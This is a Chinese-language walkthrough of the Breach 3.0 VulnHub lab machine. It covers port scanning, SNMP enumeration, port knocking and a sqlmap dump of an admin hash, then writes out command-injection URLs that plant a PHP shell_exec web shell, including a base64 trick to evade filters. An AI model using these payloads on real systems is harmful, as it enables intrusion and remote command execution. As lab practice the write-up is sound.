Fork me on GitHub

Breach3.0靶机渗透记录

题目地址:https://www.vulnhub.com/entry/breach-301,177/

下载好靶机文件之后需要先把文件后缀改为ova,把之前的“.”去掉,然后用Vmware打开此文件导入虚拟机,等待虚拟机导入完毕,将网络设置为NAT并设置DHCP服务器,使靶机能自动获取IP地址,然后开启虚拟机。

虚拟机打开之后会显示自动配置网络设置,靶机系统是Ubuntu14.04,靶机成功启动之后查看虚拟机网卡的网段,然后使用nmap进行这一网段的ping扫描来确定存活主机:

1
nmap -sn 192.168.229.0/24

扫描结果显示有两台存活主机,一台是我的kali虚拟机(192.168.229.128),另一台应该就是靶机了,靶机的IP地址为192.168.229.128

下一步是继续对靶机进行信息收集,还是用nmap扫一下开放的端口:

1
nmap -T4 -A -v 192.168.229.129

结果显示一个TCP端口都没有,奇了怪了,没入口怎么破,于是又扫了一下UDP端口的开放情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
☁  ~  nmap -sS -sU -T4 -A -v 192.168.229.129
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-19 09:21 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:21
Completed NSE at 09:21, 0.00s elapsed
Initiating NSE at 09:21
Completed NSE at 09:21, 0.00s elapsed
Initiating ARP Ping Scan at 09:21
Scanning 192.168.229.129 [1 port]
Completed ARP Ping Scan at 09:21, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:21
Completed Parallel DNS resolution of 1 host. at 09:21, 0.01s elapsed
Initiating SYN Stealth Scan at 09:21
Scanning 192.168.229.129 [1000 ports]
Completed SYN Stealth Scan at 09:21, 21.53s elapsed (1000 total ports)
Initiating UDP Scan at 09:21
Scanning 192.168.229.129 [1000 ports]
Discovered open port 161/udp on 192.168.229.129
Completed UDP Scan at 09:22, 10.01s elapsed (1000 total ports)
Initiating Service scan at 09:22
Scanning 1000 services on 192.168.229.129
Service scan Timing: About 0.40% done
Service scan Timing: About 3.20% done; ETC: 11:03 (1:38:19 remaining)
Service scan Timing: About 6.20% done; ETC: 10:40 (1:13:53 remaining)
Service scan Timing: About 9.20% done; ETC: 10:32 (1:04:09 remaining)
Service scan Timing: About 12.20% done; ETC: 10:28 (0:58:32 remaining)
Service scan Timing: About 15.20% done; ETC: 10:26 (0:54:29 remaining)
Service scan Timing: About 18.20% done; ETC: 10:24 (0:51:10 remaining)
Service scan Timing: About 23.50% done; ETC: 10:17 (0:42:39 remaining)
Service scan Timing: About 24.20% done; ETC: 10:22 (0:45:50 remaining)
Service scan Timing: About 29.40% done; ETC: 10:17 (0:39:16 remaining)
Service scan Timing: About 35.40% done; ETC: 10:17 (0:35:46 remaining)
Service scan Timing: About 41.40% done; ETC: 10:17 (0:32:21 remaining)
Service scan Timing: About 47.40% done; ETC: 10:17 (0:28:59 remaining)
Service scan Timing: About 53.40% done; ETC: 10:17 (0:25:38 remaining)
Service scan Timing: About 59.40% done; ETC: 10:16 (0:22:18 remaining)
Service scan Timing: About 65.40% done; ETC: 10:16 (0:18:59 remaining)
Service scan Timing: About 71.40% done; ETC: 10:16 (0:15:41 remaining)
Service scan Timing: About 77.40% done; ETC: 10:16 (0:12:23 remaining)
Service scan Timing: About 83.40% done; ETC: 10:16 (0:09:05 remaining)
Service scan Timing: About 88.90% done; ETC: 10:17 (0:06:06 remaining)
Service scan Timing: About 94.90% done; ETC: 10:17 (0:02:48 remaining)
Completed Service scan at 10:17, 3319.00s elapsed (1000 services on 1 host)
Initiating OS detection (try #1) against 192.168.229.129
Retrying OS detection (try #2) against 192.168.229.129
NSE: Script scanning 192.168.229.129.
Initiating NSE at 10:17
Completed NSE at 10:18, 45.22s elapsed
Initiating NSE at 10:18
Completed NSE at 10:19, 55.12s elapsed
Nmap scan report for 192.168.229.129
Host is up (0.0042s latency).
Not shown: 1000 filtered ports, 999 open|filtered ports
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: ad610f2abb4d5b5800000000
| snmpEngineBoots: 19
|_ snmpEngineTime: 1h08m06s
| snmp-sysdescr: Linux Initech-DMZ01 4.4.0-45-generic #66~14.04.1-Ubuntu SMP Wed Oct 19 15:05:38 UTC 2016 x86_64
|_ System uptime: 1h08m7.02s (408702 timeticks)
MAC Address: 00:0C:29:76:41:E4 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Service Info: Host: Initech-DMZ01

TRACEROUTE
HOP RTT ADDRESS
1 4.20 ms 192.168.229.129

NSE: Script Post-scanning.
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3455.13 seconds
Raw packets sent: 4049 (152.554KB) | Rcvd: 3 (308B)

发现只有161端口是开着的,运行了SNMP服务,做到这里想到获取此端口上暴漏的信息,于是百度有关snmp的命令,结果没什么收获,只是知道有GET方法,于是在kali中输入snmp+tab

1
2
3
4
5
6
☁  ~  snmp
snmp-bridge-mib snmp-check snmpget snmpset snmptrap
snmpbulkget snmpconf snmpgetnext snmpstatus snmpusm
snmpbulkwalk snmpd snmpinform snmptable snmpvacm
snmpc snmpdelta snmpkey snmptest snmpwalk
snmpcheck snmpdf snmpnetstat snmptranslate

发现了与GET命令相关的命令snmpget于是尝试一波,发现如下信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
☁  ~  snmpget 192.168.229.129      
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 192.168.229.129:161 using SNMPv1 and community 'public'

[*] System information:

Host IP address : 192.168.229.129
Hostname : Initech-DMZ01
Description : Linux Initech-DMZ01 4.4.0-45-generic #66~14.04.1-Ubuntu SMP Wed Oct 19 15:05:38 UTC 2016 x86_64
Contact : Email: Milton@breach.local - (545)-232-1876
Location : Initech - is this thing on? I doubt anyone thinks to look here, anyways, I've left myself a way back in and burn the place down once again.
Uptime snmp : 15:12:39.80
Uptime system : 15:12:23.84
System date : 2018-9-20 00:21:49.0

“这东西是开着的吗?我怀疑任何人都会想看看这里,不管怎样,我给自己留了一条路,再一次烧毁了这个地方。”,这里说出题人在这里留了后门,他离开的时候就会把后门给烧毁(破坏),其实这是个坑,因为只靠这一个端口很难继续进行下去,而且出题者说了留下了后门,那这里一定是有可以打开部分TCP端口的方法的,于是我找到了端口敲门服务https://www.cnblogs.com/wsjhk/p/5508051.html

1
apt-get install knockd

而上文中跟敲门序列最相近的就是email后面的数字了,因此:

1
knock 192.168.229.129 545 232 1876

命令执行无任何回显,此时在扫一下TCP端口发现多了很多

1
2
3
4
5
6
7
Scanning 192.168.229.129 [1000 ports]
Discovered open port 23/tcp on 192.168.229.129
Discovered open port 22/tcp on 192.168.229.129
Discovered open port 10010/tcp on 192.168.229.129
Discovered open port 5800/tcp on 192.168.229.129
Discovered open port 2048/tcp on 192.168.229.129
Discovered open port 10009/tcp on 192.168.229.129

看到telnet,先连一下试试:

1
2
3
4
5
6
☁  ~  telnet 192.168.229.129      
Trying 192.168.229.129...
Connected to 192.168.229.129.
Escape character is '^]'.
I used to have a backdoor here but they closed it down around when they moved my desk into the basement.
Connection closed by foreign host.

“以前这里有后门,但当他们把我的桌子搬到地下室时,他们把它关上了。”
没什么思路,继续练一下ssh试试

1
2
3
4
5
6
7
8
9
10
11
12
13
 ~  ssh root@192.168.229.129
**********************************************************************
* *
* The Bobs Cloud Hosting, LLC. Secure Backdoor *
* *
* *
* If you wish to discuss cloud hosting options, give us a call at *
* *
* 555-423-1800 or email us at thebobs@thebobscloudhostingllc.net *
* *
**********************************************************************

root@192.168.229.129's password:

不知道密码,在这里卡了一段时间,最后突然发现这个knock序列跟刚才不一样,重新敲下门

1
knock 192.168.229.129 555 423 1800

重新看一下开放的端口发现多了个8的TCP端口,服务是apache-httpd于是尝试从浏览器访问,发现此网站需要身份认证,账户密码在同系列挑战中的前两个挑战中留下了账号密码的信息:milton|thelaststraw,用此账户名密码登陆后看到如下界面:

发现一个待办事项表,而且这个上面提到了“掠夺他们所有的数据库”,点击下方的链接就来到了一个貌似是网站后台的登陆界面:

结合前面的提示,这明显是一个注入页面,于是Sqlmap启动,这是一个POST注入,我截获的部分Http头内容如下:

1
2
3
4
5
6
7
8
9
Referer: http://192.168.229.129:8/breach3/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Cookie: PHPSESSID=nigh3kqnonu8co9frhn9fa6rh6
Authorization: Basic bWlsdG9uOnRoZWxhc3RzdHJhdw==
Connection: close
Upgrade-Insecure-Requests: 1

username=test&password=asdasdasd&submit=+Login+

所以命令为:

1
sqlmap -u "http://192.168.229.129:8/breach3/index.php" --dbms=mysql --auth-type=basic --auth-cred=milton:thelaststraw --level=3 --risk=3 --data="username=me&password=me&submit=+Login+" -p password  -D thebobs --dump

得到的结果是

1
2
3
4
5
6
7
8
Database: thebobs
Table: login
[1 entry]
+----+----------+------------------------------------------+
| id | username | password |
+----+----------+------------------------------------------+
| 1 | admin | 8f4fadb24304d60d9dcb1589aa6a5c2d2d373229 |
+----+----------+------------------------------------------+

利用此账号密码进行登陆

进入管理界面,并发现了更多的页面:

http://192.168.229.129:8/breach3/initechnetmonitor.php页面的内容:

这里显示了这台主机的网络信息,这里可以看到ICMP服务是关闭的,也就是直接去ping这台服务器是ping不同的,这里我就很好奇既然ping不通那么我第一步做主机ping扫描的时候nmap是怎么识别出这台主机的?

既然游客这么多的页面,而且貌似没有更深的目录了,因此AppScan启动,扫描结果为该网站存在命令执行漏洞,此处试了一下把一句话echotxt中:

1
http://192.168.229.129:8/breach3/thebobscloudhostingllc/livechat.php?searcher=echo '<?php echo shell_exec($_GET['e']); ?>' >test.txt

此时发现test.txt中已经将一句话写入成功了

接下来怎么办呢,当然是写小马了,于是:

1
http://192.168.229.129:8/breach3/thebobscloudhostingllc/livechat.php?searcher=echo '<?php echo shell_exec($_GET['e']); ?>' >shell.php

此时试试我们的小马能不能用:

1
http://192.168.229.129:8/breach3/thebobscloudhostingllc/shell.php?e=ls

执行成功,完美,其实这里有个小技巧,因为直接以铭文的方式写shell的话如果有waf或者某些过滤语句可能会把语句中的部分符号或者命令给过滤掉,因此可以采用先baseEncode后baseDecode的方式写shell:

1
2
☁  ~  echo '<?php echo shell_exec($_GET['e']); ?>' | base64
PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUW2VdKTsgPz4K
1
http://192.168.229.129:8/breach3/thebobscloudhostingllc/livechat.php?searcher=echo PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUW2VdKTsgPz4K | base64 -d > shell.php

这种方式可以保证写的东西不被过滤掉。

做到这里就可以试试查看一下各种文件了,但是文件很多,一般来说出题人都会把重要的文件放在home、tmp等文件夹中,查看一下:

您的支持是我最大的动力🍉